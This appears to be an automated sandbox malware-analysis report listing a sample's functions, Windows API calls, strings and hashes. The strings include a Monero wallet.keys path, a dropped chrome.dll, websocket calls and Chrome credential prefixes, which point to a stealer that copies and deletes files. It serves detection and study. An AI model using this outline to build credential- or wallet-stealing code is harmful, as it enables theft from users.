                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB69C6
                                • ExitProcess.KERNEL32 ref: 00EB69F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 5cb490017541fb785a86d6aec0756a9512c5f0f8a553616f6c7905f8febe817c
                                • Instruction ID: 742569796b18ed0470955bcf606da2d843b8c6bb4fe10fa1d81abbfc4fa15dca
                                • Opcode Fuzzy Hash: 5cb490017541fb785a86d6aec0756a9512c5f0f8a553616f6c7905f8febe817c
                                • Instruction Fuzzy Hash: 19310CB1901118AADB18EFA0DD96FDEBBB8AF04300F4451A9F21576281DF706A88CF65
                                Function 00EB8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EC0E10,00000000,?), ref: 00EB89BF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB89C6
                                • wsprintfA.USER32 ref: 00EB89E0
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 9ab5c429fbefd055df3ec9de96fa431e2391832fd5c5ce3bb845412b8d56bf9e
                                • Instruction ID: ab98d28d97a94fa5f36543f4e5148b9864a6a603ff0f5d02303afe6b876a9cf1
                                • Opcode Fuzzy Hash: 9ab5c429fbefd055df3ec9de96fa431e2391832fd5c5ce3bb845412b8d56bf9e
                                • Instruction Fuzzy Hash: CD2108B1A44208AFDB14DF94DD49FAEBBB8FB49710F104529FA25A73C4C775A940CBA0
                                Function 00EAA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00EAA098
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                • API String ID: 1029625771-1545816527
                                • Opcode ID: af5bd6705a4e48dadcb4dd0faa9834d0b017072ae59ae25a757f77ea610191ee
                                • Instruction ID: cff379deb7cc96155dc78918ed44f495f38e06b025a2433d8b33380a48aebf15
                                • Opcode Fuzzy Hash: af5bd6705a4e48dadcb4dd0faa9834d0b017072ae59ae25a757f77ea610191ee
                                • Instruction Fuzzy Hash: 41F09078645304AFC73BAB60E94CB6632B4E34B304F112538F025AB3C4C7B5A9C4CB52
                                Function 00EB8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EB96AE,00000000), ref: 00EB8EEB
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB8EF2
                                • wsprintfW.USER32 ref: 00EB8F08
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 2c4737adc07a3067f3d997d8b899d48e4a30d15bb409cea210c5ef0ca1718ef9
                                • Instruction ID: 7c496cf518ee3eabcebc58ff30cc03ec571e179bf354eb95c5668563e89cd1ef
                                • Opcode Fuzzy Hash: 2c4737adc07a3067f3d997d8b899d48e4a30d15bb409cea210c5ef0ca1718ef9
                                • Instruction Fuzzy Hash: B5E0EC75A44309FBDB28DBD4ED0EE6D77B8EB05701F0041A4FD1997380DA719E509B91
                                Function 00EAA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAAA11
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00EAAB2F
                                • lstrlen.KERNEL32(00000000), ref: 00EAADEC
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                • DeleteFileA.KERNEL32(00000000), ref: 00EAAE73
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 0c3265e1d01ecc163221457dbeddb53b036c6c3f831574ec4917229bb6d4521d
                                • Instruction ID: 1f2ea7184bbd323a691f4bb6a8b6ffd72987e33e74a55ea1109c644bc14a9bd9
                                • Opcode Fuzzy Hash: 0c3265e1d01ecc163221457dbeddb53b036c6c3f831574ec4917229bb6d4521d
                                • Instruction Fuzzy Hash: 76E1E172910108ABCF15FBA4DDA2EEF7379AF14300F5495B9F12676191EF306A48CB62
                                Function 00EAD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAD581
                                • lstrlen.KERNEL32(00000000), ref: 00EAD798
                                • lstrlen.KERNEL32(00000000), ref: 00EAD7AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00EAD82B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 8a2ae259f9088c77342fcfeff1e52ebcbcddfa8d80c412a57350231d19fec04b
                                • Instruction ID: 8a481c6e8b510d50d214599e5a63919f34ad3d3ccfa64d6c85165705fe20d24a
                                • Opcode Fuzzy Hash: 8a2ae259f9088c77342fcfeff1e52ebcbcddfa8d80c412a57350231d19fec04b
                                • Instruction Fuzzy Hash: DC910F72910108ABCF18FBA4DDA6EEF73B9AF14300F545579F12676191EF306A48CB62
                                Function 00EAD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EAD901
                                • lstrlen.KERNEL32(00000000), ref: 00EADA9F
                                • lstrlen.KERNEL32(00000000), ref: 00EADAB3
                                • DeleteFileA.KERNEL32(00000000), ref: 00EADB32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 58df11aafa4e3bea6a8ef5079e44306309b1f2bee65b05bb3128377ed8a8450f
                                • Instruction ID: 95b3da9714cbc363a0a4a0730d729eee919c1e072f3f71072cb2c8f346d81026
                                • Opcode Fuzzy Hash: 58df11aafa4e3bea6a8ef5079e44306309b1f2bee65b05bb3128377ed8a8450f
                                • Instruction Fuzzy Hash: 3F81FE72920108ABCF18FBA4DDA6EEF73B9AF14300F445578F11676191EF306A48CB62
                                Function 00F1FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AdjustPointer
                                • String ID:
                                • API String ID: 1740715915-0
                                • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                • Instruction ID: c03b811457129bc2238d03bf924130ca189b16d6775d1013b04de404c2aa71eb
                                • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                • Instruction Fuzzy Hash: BB51D073900216AFEB29CF14D841BFA77A5FF41320F24422DE81686592EB75ED85FB90
                                Function 00EAA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EAA664
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: @$v10$v20
                                • API String ID: 2746078483-278772428
                                • Opcode ID: 216b03d865e9fe38dbce985a89565aeb19a9cf0ec7889c92c9d4eda626f865b4
                                • Instruction ID: 59989523922d550c5867e86cff175e5188b0a037bf8fdc813800c0a81c746775
                                • Opcode Fuzzy Hash: 216b03d865e9fe38dbce985a89565aeb19a9cf0ec7889c92c9d4eda626f865b4
                                • Instruction Fuzzy Hash: 2D512974A10208ABDF14EFA4CD96FEE77B5AF45304F449028F90A7F291EB706A45CB51
                                Function 00EAF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
